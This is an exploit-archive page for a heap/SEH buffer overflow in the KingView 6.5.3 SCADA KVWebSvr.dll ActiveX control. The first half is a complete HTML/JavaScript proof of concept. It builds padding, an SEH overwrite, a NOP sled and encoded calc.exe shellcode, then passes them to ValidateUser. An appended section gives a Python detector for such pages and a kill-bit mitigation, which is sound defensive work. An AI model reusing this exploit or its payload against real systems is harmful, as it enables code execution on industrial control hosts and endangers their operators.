# Title : KingView 6.5.3 SCADA ActiveX Exploit
# Published : 2011-03-07
# Author : Carlos Mario Penagos Hollmann
# Exploit Title: KingView 6.5.3 SCADA ActiveX
# Date: March 07 2011
# Author: Carlos Mario Penagos Hollmann
# Software Link: http://download.kingview.com/software/kingview%20English%20Version/kingview6.53_EN.rar
# Version: 6.53 (English)
# Tested on: Windows XP SP3 running on VMware Fusion 3.1 and VirtualBox 3.2.8
Thanks to Dillon Beresford for Heap Exploit
<html>
mail----> shogilord^gmail.com spams are welcome!!!!!
________ _ _________ ____ __ _____ ________
/ ____/ / | | / / ____/ | / / //_// _/ | / / ____/
/ __/ / / | | / / __/ / |/ / ,< / // |/ / / __
/ /___/ /___| |/ / /___/ /| / /| |_/ // /| / /_/ /
/_____/_____/|___/_____/_/ |_/_/ |_/___/_/ |_/____/
COLOMBIA hacking presents.............
Beijing WellinControl Technology Development Co.,Ltd FIX your KVWebSvr.dll
<object classid='clsid:F31C42E3-CBF9-4E5C-BB95-521B4E85060D' id='target'></object>
<script language='javascript'>
nse="\xEB\x06\x90\x90";   // lands in the nSEH slot: short jump forward over the SEH record
seh="\x4E\x20\xD1\x72";   // overwrites the SEH handler pointer
nops="\x90";
while (nops.length<10){ nops+="\x90";}
/*Calc.exe alpha_upper badchars --> "\x8b\x93\x83\x8a\x8c\x8d\x8f\x8e\x87\x81\x84\x86\x88\x89\x90\x91\x92\x94\x95\x96\x97\x98\x99\x82\x85\x9f\x9a\x9e\x9d\x9b\x9f\x76*/
shell="\x54\x5f\xda\xdf\xd9\x77\xf4\x5e\x56\x59\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4c\x4b\x5a\x4c\x50\x55\x4c\x4b\x5a\x4c\x43\x58\x51\x30\x51\x30\x51\x30\x56\x4f\x52\x48\x52\x43\x45\x31\x52\x4c\x43\x53\x4c\x4d\x51\x55\x5a\x58\x56\x30\x58\x38\x49\x57\x4d\x43\x49\x52\x54\x37\x4b\x4f\x58\x50\x41\x41";   // alpha_upper-encoded calc.exe payload, as published
junk1="A";
junk2="A";
while (junk1.length<624){ junk1+=junk1;}   // 624 bytes of padding before the SEH record
junk1=junk1.substring(0,624);
junk2=junk1;
while (junk2.length<8073){ junk2+=junk2;}  // trailing filler pushing the argument past 8 KB
arg2=junk1+nse+seh+nops+shell+junk2;
arg1="Anything";
target.ValidateUser(arg1 ,arg2);   // the oversized second argument overwrites the SEH record
</script>
</html>
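Added for readers triaging pages like this one, as an example that is not part of the original PoC or of the vendor's software: a small Python script that flags an HTML document which instantiates the KVWebSvr.dll CLSID used above together with the markers this PoC exhibits (a ValidateUser call, string-doubling loops that build multi-kilobyte padding, and long runs of \xNN escapes). The CLSID is taken from the page; the thresholds, finding names and both sample documents are this example's own assumptions, and the sample payload is 0x41 filler rather than the published shellcode.

```python
import re

# CLSID of the KVWebSvr.dll control instantiated by the PoC on this page.
KINGVIEW_CLSID = "F31C42E3-CBF9-4E5C-BB95-521B4E85060D"

# Triage heuristics. These thresholds and patterns are this example's own
# assumptions, not a vendor rule or a published signature.
MIN_DOUBLING_TARGET = 512   # string-doubling loops aiming past this look like padding
MIN_ESCAPED_BYTES = 32      # runs of \xNN escapes this long look like a raw payload

CLSID_RE = re.compile(r"classid\s*=\s*['\"]?clsid:\{?([0-9A-Fa-f-]{36})\}?")
CALL_RE = re.compile(r"\.\s*ValidateUser\s*\(")
ESCAPED_RUN_RE = re.compile(r"((?:\\x[0-9A-Fa-f]{2}){4,})")
DOUBLING_LOOP_RE = re.compile(
    r"while\s*\(\s*(\w+)\.length\s*<\s*(\d+)\s*\)\s*\{\s*\1\s*\+=")


def escaped_literal_to_bytes(literal):
    """Decode a run of JavaScript-style \\xNN escapes into raw bytes."""
    return bytes(int(h, 16) for h in re.findall(r"\\x([0-9A-Fa-f]{2})", literal))


def scan_html(html):
    """Return the list of finding tags raised by one HTML/JS document."""
    findings = []
    for m in CLSID_RE.finditer(html):
        if m.group(1).upper() == KINGVIEW_CLSID:
            findings.append("kingview-clsid")
    if CALL_RE.search(html):
        findings.append("validateuser-call")
    for m in DOUBLING_LOOP_RE.finditer(html):
        if int(m.group(2)) >= MIN_DOUBLING_TARGET:
            findings.append(f"string-doubling-loop:{m.group(1)}:{m.group(2)}")
    for m in ESCAPED_RUN_RE.finditer(html):
        raw = escaped_literal_to_bytes(m.group(1))
        if len(raw) >= MIN_ESCAPED_BYTES:
            findings.append(f"escaped-bytes:{len(raw)}")
    return findings


def assess(html):
    """Collapse findings into one verdict: clean, control-instantiated or likely-exploit."""
    findings = scan_html(html)
    if "kingview-clsid" not in findings:
        return "clean"
    corroborating = [f for f in findings if f != "kingview-clsid"]
    return "likely-exploit" if corroborating else "control-instantiated"


# Constructed sample: the shape of the PoC above, with the payload replaced by
# 40 bytes of 0x41 so that nothing here is the published shellcode.
SAMPLE_PAGE = "\n".join([
    "<html>",
    "<object classid='clsid:F31C42E3-CBF9-4E5C-BB95-521B4E85060D' id='target'></object>",
    "<script language='javascript'>",
    'junk1="A";',
    "while (junk1.length<624){ junk1+=junk1;}",
    "junk1=junk1.substring(0,624);",
    "junk2=junk1;",
    "while (junk2.length<8073){ junk2+=junk2;}",
    'shell="' + r"\x41" * 40 + '";',
    'target.ValidateUser("Anything", junk1+shell+junk2);',
    "</script>",
    "</html>",
])

# Constructed benign page: no ActiveX control at all.
BENIGN_PAGE = "<html><script>var greeting='hello'; document.title=greeting;</script></html>"

if __name__ == "__main__":
    for name, page in (("sample", SAMPLE_PAGE), ("benign", BENIGN_PAGE)):
        print(name, assess(page), scan_html(page))
```

The scan is purely string based, so a script that builds the same buffer through obfuscated concatenation will not match; treat "likely-exploit" as a triage hint to pull the page for analysis, not as a verdict. On hosts that have the control installed, the usual interim mitigation until a fixed KVWebSvr.dll is deployed is an ActiveX kill bit for this CLSID (a Compatibility Flags DWORD of 0x400 under HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{CLSID}), which stops Internet Explorer instantiating the control from any page regardless of what the page looks like.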